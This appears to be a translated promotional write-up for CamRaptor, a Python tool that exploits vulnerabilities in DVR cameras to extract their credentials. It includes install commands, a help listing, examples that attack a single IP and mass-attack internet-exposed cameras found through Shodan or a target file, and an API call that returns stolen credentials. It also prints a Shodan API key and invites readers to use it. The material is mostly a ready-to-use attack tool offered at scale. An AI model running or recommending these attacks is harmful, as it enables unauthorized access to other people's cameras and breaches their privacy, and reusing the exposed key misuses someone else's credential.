CamRaptor： A vulnerability exploitation tool for DVR cameras

Can exploit multiple security vulnerabilities in current mainstream DVR cameras, such as Novo, CeNova, and QSee, etc.

Optimized to support attacking multiple target DVR cameras in the list simultaneously in multi-threaded form.

Simple command-line interface and API usage methods.

Tool Installation

Since CamRaptor is developed using Python3, you first need to install and configure the Python3 environment on your local device. Next, researchers can use the following command to download and install CamRaptor:

pip3 install git+https://github.com/EntySec/CamRaptor

Basic Usage of Tool

The usage of CamRaptor is very simple, we just need to enter the 'camraptor' command in the command line terminal to use CamRaptor:

usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]

[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

 

CamRaptor is a tool that exploits several vulnerabilities in popular DVR

cameras to obtain network camera credentials.

 

optional arguments:

-h, --help          Display this help information and exit

-t, --threads       Enable multi-threaded mode for better performance

-o OUTPUT, --output OUTPUT

Store the results in a file

-i INPUT, --input INPUT

Input file for address

-a ADDRESS, --address ADDRESS

Provide a single address

--shodan SHODAN    Use the Shodan API key used by the remote device over the network

--zoomeye ZOOMEYE    Use the ZoomEye API key used by the remote device over the network

-p PAGES, --pages PAGES

The number of pages to be obtained through ZoomEye

Tool usage example

Attack a single camera

The following command can attack a single DVR camera：

camraptor -a 192.168.99.100

Attack remote DVR cameras over the network

Next, we can use the Shodan search engine to search for and attack cameras on the network, at this time we can use the -t parameter to set the number of threads to achieve better performance：

camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

Note: The Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) provided in the project is the developer's own professional API key. You can use your own key, of course, and if you want to use the developer's key, that's fine too, we are sharing resources after all!

Get target camera from input file

We can also use camera addresses provided by the open database, at this time we can use the -t parameter to set the number of threads to achieve better performance：

camraptor -t -i cameras.txt -o passwords.txt

Note: This command will attack all cameras listed in cameras.txt and store all obtained passwords in the passwords.txt file.

API usage

CamRaptor also provides its own Python API, which can be imported into your own project code and used to call its functions：

from camraptor import CamRaptor

Basic functions

exploit(address)：Perform an exploit attack on a single target based on the given address；

Example call

Attack a single camera：

from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)

Project address

CamRaptor：【GitHub link】